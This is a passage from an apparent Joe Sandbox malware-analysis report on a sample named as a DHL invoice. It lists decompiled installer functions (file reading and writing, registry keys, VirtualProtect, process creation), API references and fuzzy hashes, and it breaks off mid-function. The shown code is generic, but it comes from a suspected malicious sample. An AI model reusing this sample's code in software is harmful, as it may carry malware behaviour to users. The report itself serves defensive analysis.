0x0040170b
0x0040170b
0x00402ea5
0x00402eb7

APIs

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 004025A1

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 9af0a1d878fae9e3e89ffa2e9034ec420723555003de84cdee57c9f052185a13
Instruction ID: f65784f0cf837312192d28317bace7b0ee78b13f5a7e28397f60b6fd89985110
Opcode Fuzzy Hash: 9af0a1d878fae9e3e89ffa2e9034ec420723555003de84cdee57c9f052185a13
Instruction Fuzzy Hash: 90E09A32505254BAD6703A738C09B2B299C5B407A2B64023FB806B22CAE9F98E01812D

Uniqueness

Uniqueness Score: -1.00%

Function 00406948 Relevance: 1.5, APIs: 1, Instructions: 24
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406948(void* __ecx, void* _a4, void* _a8, long _a12) {
				long _v8;
				int _t7;
				long _t11;
				struct _OVERLAPPED* _t14;

				_t11 = _a12;
				_t14 = 0;
				_t7 = ReadFile(_a4, _a8, _t11,  &_v8, 0); // executed
				if(_t7 != 0 && _t11 == _v8) {
					_t14 = 1;
				}
				return _t14;
			}

0x0040694e
0x00406954
0x0040695f
0x00406967
0x0040696e
0x0040696e
0x00406974

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,004031A2,00000004,00000004,00000000,00000000,00000000,00000000), ref: 0040695F

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 2db7c5b5d383cb428e65bf87e114ea6cc39ae6a838efe8624f6ef6c49ed421ec
Instruction ID: 496ccccc8c492c243bc388fe3eb656b5cfb520ee4410d2fb8332981663b8a2fe
Opcode Fuzzy Hash: 2db7c5b5d383cb428e65bf87e114ea6cc39ae6a838efe8624f6ef6c49ed421ec
Instruction Fuzzy Hash: 38E04672200229BBCF209B9ADC08D9FBFADEE957A07024026B805A3110D270EE21C6E4

Uniqueness

Uniqueness Score: -1.00%

Function 00406A0B Relevance: 1.5, APIs: 1, Instructions: 24
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406A0B(void* __ecx, void* _a4, void* _a8, long _a12) {
				long _v8;
				int _t7;
				long _t11;
				struct _OVERLAPPED* _t14;

				_t11 = _a12;
				_t14 = 0;
				_t7 = WriteFile(_a4, _a8, _t11,  &_v8, 0); // executed
				if(_t7 != 0 && _t11 == _v8) {
					_t14 = 1;
				}
				return _t14;
			}

0x00406a11
0x00406a17
0x00406a22
0x00406a2a
0x00406a31
0x00406a31
0x00406a37

APIs

WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,?,0041F538,00403348,?,0041F538,?,0041F538,?,00000004), ref: 00406A22

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: df327e9a7695e02a5bae04bfea65e0978199b1218c5bef36048a46936c94f75f
Instruction ID: 40df579de253d7cbce13811cecf730e98513d225cd3d08ff0a4c9fddec416105
Opcode Fuzzy Hash: df327e9a7695e02a5bae04bfea65e0978199b1218c5bef36048a46936c94f75f
Instruction Fuzzy Hash: F9E0BF32600129BBCF205B5ADC04E9FFF6DEE926A07114026F905A2150E670EE11DAE4

Uniqueness

Uniqueness Score: -1.00%

Function 004062A5 Relevance: 1.5, APIs: 1, Instructions: 24
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004062A5(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406120(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x004062af
0x004062b6
0x004062ce
0x00000000
0x004062ce
0x004062ba
0x00000000

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?), ref: 004062CE

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 9d74b961b3018e30b71e857dcddf3078069952a5892463cd94a54035f436c205
Instruction ID: 8015555a5faba5d47a7295c794b4dc45a0f837954a803b2f281cb622c6ff763f
Opcode Fuzzy Hash: 9d74b961b3018e30b71e857dcddf3078069952a5892463cd94a54035f436c205
Instruction Fuzzy Hash: 38E0B6B201020ABEEF096F90DC0ADBB7A5DEB08310F00492EFA0694091E6B5AD30A634

Uniqueness

Uniqueness Score: -1.00%

Function 6EF21A4A Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x6ef25014 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x6ef2501c, 4, 0x40, 0x6ef25034); // executed
					 *0x6ef2501c = 0xc2;
					 *0x6ef25034 = 0;
					 *0x6ef25030 = 0;
					 *0x6ef2502c = 0;
					 *0x6ef25028 = 0;
					 *0x6ef25024 = 0;
					 *0x6ef25020 = 0;
					 *0x6ef2501e = 0;
				}
				return 1;
			}

0x6ef21a53
0x6ef21a58
0x6ef21a68
0x6ef21a70
0x6ef21a77
0x6ef21a7d
0x6ef21a83
0x6ef21a89
0x6ef21a8f
0x6ef21a95
0x6ef21a9b
0x6ef21a9b
0x6ef21aa4

APIs

VirtualProtect.KERNELBASE(6EF2501C,00000004,00000040,6EF25034), ref: 6EF21A68

Memory Dump Source

Source File: 00000000.00000002.11492715606.000000006EF21000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EF20000, based on PE: true

Associated: 00000000.00000002.11492664043.000000006EF20000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.11492760898.000000006EF24000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.11492804171.000000006EF26000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ef20000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 4d35c4aca6f0987581f496efd9743f95152f82fa2031a6a4a0223685e6e04ee0
Instruction ID: 64a66e899986322da697541bde5959a46f104849f2498dceef412d353c1bc97e
Opcode Fuzzy Hash: 4d35c4aca6f0987581f496efd9743f95152f82fa2031a6a4a0223685e6e04ee0
Instruction Fuzzy Hash: 32F09870939B42EFCF18CFD89E547053EA0A79A354B00852EF248DE348C3704101AB9B

Uniqueness

Uniqueness Score: -1.00%

Function 004062D8 Relevance: 1.5, APIs: 1, Instructions: 19
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004062D8(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406120(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x004062e2
0x004062e9
0x004062fc
0x00000000
0x004062fc
0x004062ed
0x00000000

APIs

RegOpenKeyExW.KERNELBASE(00000000,?,00000000,?,00000000,00000800,?,?,004069A5,00000800,?,?,?,Call,00000000,00000000), ref: 004062FC

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 6046d274b78c3224a6ad722eb80787644d3a57436a5b6bc7b2547111f35c777e
Instruction ID: 212ff8f8ceecf1c7f7b975949926931c9c9ff354a47ded1b1035142b567bad43
Opcode Fuzzy Hash: 6046d274b78c3224a6ad722eb80787644d3a57436a5b6bc7b2547111f35c777e
Instruction Fuzzy Hash: 81D0123204020EBBDF116F909D05FAB3B2DAB08340F004436FE06A4091D775D930A758

Uniqueness

Uniqueness Score: -1.00%

Function 004054E8 Relevance: 1.5, APIs: 1, Instructions: 9
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004054E8(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x4349dc;
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}

0x004054e8
0x004054ef
0x004054fa
0x00000000
0x004054fa
0x00405500

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054FA

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: e4e95d0fddce0dc824c6f013e603094366fa7490cb3008435431beda4080c4b1
Instruction ID: f4f70a023dfa60edfff8c312ec9360925e699ce3f775cceab6ab340ddbd6ed3a
Opcode Fuzzy Hash: e4e95d0fddce0dc824c6f013e603094366fa7490cb3008435431beda4080c4b1
Instruction Fuzzy Hash: BFC04C716402407ADA109B619D09F477755AB90700F5094257200E51E4D674F410CA1C

Uniqueness

Uniqueness Score: -1.00%

Function 00405503 Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405503(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x4349f8, 0x28, _a4, "true"); // executed
				return _t2;
			}

0x00405511
0x00405517

APIs

SendMessageW.USER32(00000028,?,?,00405338), ref: 00405511

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 0b1b9ea5971de38bd84785100290da62d9cd6102021a2a242e6f148554a4776c
Instruction ID: 6de71dbe5e5d375af2ff60806ac132807507260846fa189ddd953f73e58556b8
Opcode Fuzzy Hash: 0b1b9ea5971de38bd84785100290da62d9cd6102021a2a242e6f148554a4776c
Instruction Fuzzy Hash: 5EB092B5181201BADA919B10DD09F8A7B62ABA4702F028564B200640B0C7B214A0DB18

Uniqueness

Uniqueness Score: -1.00%

Function 00403131 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403131(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40b010, _a4, 0, 0); // executed
				return _t2;
			}

0x0040313f
0x00403145

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,004035D7,?,?,?,?,?,?), ref: 0040313F

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 05fd317d58219744d4d36f9992a09dc30e109d4b8129d559949c0663f1233a42
Instruction ID: 0f2f3f991563ac80fd27f5aa645e2e28db5cd0803139906cd9636725fed969f3
Opcode Fuzzy Hash: 05fd317d58219744d4d36f9992a09dc30e109d4b8129d559949c0663f1233a42
Instruction Fuzzy Hash: D2B01231240200BFEA214F00DE0AF067B21F7D0700F10C830B360780F183711460EB4C

Uniqueness

Uniqueness Score: -1.00%

Function 0040211B Relevance: 1.3, APIs: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040211B(void* _a24, void* _a32) {
				void* _v0;
				void* _v4;
				void* __ebp;
				void* _t9;
				void* _t15;
				void* _t20;

				_t17 = E0040303E(_t15, _t20);
				E00405D3A(0xffffffeb, _t7);
				_t9 = E004066D6(_t17); // executed
				if(_t9 != 0) {
					if( *((intOrPtr*)(__esp + 0x30)) != __ebp) {
						__eax = E00406514(__ecx, __esi);
						if( *((intOrPtr*)(__esp + 0x2c)) < __ebp) {
							0 = 1;
							 *((intOrPtr*)(__esp + 0x10)) = __ebx;
						} else {
							__eax = E0040661F( *((intOrPtr*)(__esp + 0x18)), __eax);
						}
					}
					_push(__esi);
					__eax = CloseHandle();
					__ebx =  *((intOrPtr*)(__esp + 0x10));
				}
				 *0x435ac8 =  *0x435ac8 + 1;
				return 0;
			}

0x00402121
0x00402126
0x0040212c
0x00402139
0x00402143
0x00402146
0x0040214f
0x0040215f
0x00402165
0x00402151
0x00402156
0x00402156
0x0040214f
0x00402169
0x00402110
0x00402ea1
0x00402ea1
0x00402ea5
0x00402eb7

APIs

Part of subcall function 00405D3A: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll,?,00000000,?,?), ref: 00405D6C
Part of subcall function 00405D3A: lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll,?,00000000,?,?), ref: 00405D7E
Part of subcall function 00405D3A: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll,?), ref: 00405D99
Part of subcall function 00405D3A: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsh6AA5.tmp\System.dll), ref: 00405DB1
Part of subcall function 00405D3A: SendMessageW.USER32(?), ref: 00405DD8
Part of subcall function 00405D3A: SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405DF3
Part of subcall function 00405D3A: SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00405E00

Part of subcall function 004066D6: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042FD78,?), ref: 004066FF
Part of subcall function 004066D6: CloseHandle.KERNEL32(?), ref: 0040670C

CloseHandle.KERNEL32(?,?), ref: 00402110

Part of subcall function 00406514: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040651E
Part of subcall function 00406514: GetExitCodeProcess.KERNEL32(?,?), ref: 00406548

Part of subcall function 0040661F: wsprintfW.USER32 ref: 0040662C

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 0c7e3ddd56b7c252a2e4c02e228c0bd9f634ef8892ef8691c332d823cf5a2231
Instruction ID: ffb54da432574bf9da0ba630d69bdc1efbc191342e5e665899b832719b8482a7
Opcode Fuzzy Hash: 0c7e3ddd56b7c252a2e4c02e228c0bd9f634ef8892ef8691c332d823cf5a2231
Instruction Fuzzy Hash: 50F0C8356093519BD310AF61DD8982FB298FF85359B100A3FFA52B51D2C77C4D068AAF

Uniqueness

Uniqueness Score: -1.00%

Function 6EF212F8 Relevance: 1.3, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EF212F8() {
				void* _t3;

				_t3 = GlobalAlloc(0x40,  *0x6ef25040 +  *0x6ef25040); // executed
				return _t3;
			}

0x6ef21302
0x6ef21308

APIs

GlobalAlloc.KERNELBASE(00000040,?,6EF211C4,-000000A0), ref: 6EF21302

Memory Dump Source

Source File: 00000000.00000002.11492715606.000000006EF21000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EF20000, based on PE: true

Associated: 00000000.00000002.11492664043.000000006EF20000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.11492760898.000000006EF24000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.11492804171.000000006EF26000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ef20000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: bbbdbaa07fc81ffe7d9f5c71c241fa5938cb082579bcb8b1833469f81f95d0ae
Instruction ID: 9caeb79d4c1bad8a911b076ee4171ad03b21272d1a883275309a6a05cb540e62
Opcode Fuzzy Hash: bbbdbaa07fc81ffe7d9f5c71c241fa5938cb082579bcb8b1833469f81f95d0ae
Instruction Fuzzy Hash: 1AB012B02104005FEE00C794DE0AF303254F781304F000000F600DD044C3644C008915

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040441E Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 576
windowmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E0040441E(struct HWND__* _a4, signed int _a8, long _a12, signed int _a16) {
				struct HWND__* _v0;
				signed int* _v40;
				void* _v44;
				signed int _v48;
				long _v52;
				void* _v56;
				signed int _v60;
				int _v64;
				struct HWND__* _v68;
				struct HWND__* _v72;
				void* _v76;
				struct HWND__* _v80;
				void* _v84;
				struct HWND__* _v88;
				intOrPtr _v96;
				void* _v100;
				void* _v104;
				struct HWND__* _v108;
				signed int _t158;
				signed int _t159;
				int _t160;
				void* _t167;
				void* _t170;
				long _t175;
				void* _t198;
				void* _t199;
				int _t209;
				intOrPtr _t214;
				signed int _t215;
				signed int _t216;
				void* _t235;
				void* _t238;
				intOrPtr _t245;
				intOrPtr _t253;
				long _t257;
				void* _t263;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				long _t279;
				long _t280;
				int _t282;
				signed int _t283;
				signed int _t285;
				signed int _t288;
				int _t293;
				signed int _t296;
				void* _t301;
				int _t302;
				void* _t303;
				void* _t306;
				signed int _t307;
				long _t311;
				struct HWND__* _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t319;
				signed int _t320;
				struct HWND__* _t321;
				int _t326;
				struct HWND__* _t327;
				intOrPtr* _t329;
				struct HWND__* _t330;
				signed int _t333;
				int _t334;
				int _t336;
				long _t337;
				intOrPtr _t338;
				signed int* _t340;
				struct HWND__* _t342;
				long _t343;
				void* _t344;
				long _t345;
				signed int _t346;
				struct HWND__* _t347;
				int _t348;
				int _t349;
				void* _t350;
				struct HWND__* _t352;
				struct HWND__* _t354;
				struct HWND__** _t355;

				_t355 =  &_v80;
				_t330 = _a4;
				_v68 = GetDlgItem(_t330, 0x3f9);
				_t347 = GetDlgItem(_t330, 0x408);
				_v72 =  *0x435a28;
				_v64 =  *0x435a10;
				_v80 = _t347;
				if(_a8 != 0x110) {
					L24:
					_t282 =  !=  ? _a8 : 0x40f;
					_v60 = 0x40f;
					_t158 =  !=  ? _a12 : 0;
					_a12 = _t158;
